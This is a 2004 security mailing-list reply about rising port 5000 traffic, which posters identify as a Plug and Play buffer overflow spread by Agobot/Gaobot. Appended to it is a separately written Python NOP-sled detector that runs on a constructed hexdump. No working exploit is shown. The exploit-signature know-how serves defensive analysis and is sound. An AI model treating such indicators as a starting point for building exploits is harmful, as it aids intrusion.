Re: TCP port 5000 syn increasing

From: Mike Barushok (barushokkeycreations.com)
Date: Mon May 17 2004 - 17:14:40 CDT
Exactly identical to the capture posted at:
 http://www.linklogger.com/TCP5000_Overflow.htm

(That page has title: 'SQL Slammer Capture').

On Mon, 17 May 2004, Noel Cuillandre wrote:

> It's a buffer overflow attack on the plug and play service on TCP port
> 5000.
> The hexdump corresponds to a SQLSlammer-like worm.
>
> Noel Cuillandre
>
> Paul Schmehl wrote:
>
> >----- Original Message -----
> >From: "ANDREW STREULE" <brother_wolfbtopenworld.com>
> >To: <incidentssecurityfocus.com>
> >Sent: Monday, May 17, 2004 2:24 PM
> >Subject: Re: TCP port 5000 syn increasing
> >
> >>on my honeypot a port 5000 event is almost always
> >>followed by 1 or 2 nbt smb events.
> >>
> >Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming
> >from boxes infected with Agobot/Gaobot and not just 81.x.x.x.
> >
> >
> >Paul Schmehl (paulsutdallas.edu)
> >Adjunct Information Security Officer
> >The University of Texas at Dallas
> >AVIEN Founding Member
> >http://www.utdallas.edu/~pauls/

--

Mike Barushok
Senior Security Administrator
KeyCreations.com/KCISP.net/ispKansas.com
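A defender-side check for the kind of capture discussed in this thread (a long run of 0x90 NOP bytes ahead of the payload), added here as an example and not code from anyone on the list: it reassembles a dump written in the same offset / hex bytes / ASCII layout and flags a NOP run the way an IDS x86 NOP-sled signature does. The sample dump is constructed for the example; it is not the thread's bytes.

```python
import re

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
OFFSET = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample (not the thread's bytes) in the layout of the capture quoted
# above: 8-digit offset, up to 16 hex bytes, ASCII column. A 40-byte 0x90 run is
# followed by placeholder bytes and the CRLF CRLF tail.
SAMPLE_HEXDUMP = """\
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00000020 90 90 90 90 90 90 90 90 41 42 43 44 45 46 47 48 ........ABCDEFGH
00000030 0D 0A 0D 0A ....
"""

def parse_hexdump(text: str) -> bytes:
    """Rebuild the payload from offset/hex/ASCII lines, checking offsets so a
    dropped or duplicated line is reported instead of silently reassembled."""
    out = bytearray()
    for raw in text.splitlines():
        tokens = raw.split()
        if len(tokens) < 2 or not OFFSET.match(tokens[0]):
            continue  # blank or unrelated line
        if int(tokens[0], 16) != len(out):
            raise ValueError(f"offset {tokens[0]} but {len(out)} bytes parsed so far")
        # Consume hex pairs until the ASCII column (first non-hex token) or 16 bytes.
        for tok in tokens[1:17]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def longest_run(payload: bytes, value: int = 0x90) -> tuple[int, int]:
    """Return (start_offset, length) of the longest run of `value`, (0, 0) if none."""
    best_start = best_len = 0
    run_start = None
    for i, b in enumerate(payload):
        if b != value:
            run_start = None
            continue
        if run_start is None:
            run_start = i
        if i - run_start + 1 > best_len:
            best_start, best_len = run_start, i - run_start + 1
    return best_start, best_len

def looks_like_nop_sled(payload: bytes, min_run: int = 32) -> bool:
    """IDS-style x86 NOP-sled heuristic: a run of at least `min_run` 0x90 bytes."""
    return longest_run(payload)[1] >= min_run
```

The 32-byte threshold is an assumption for the example; tune it against what normally reaches the port being watched, since a single 0x90 in ordinary traffic should not trip it.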
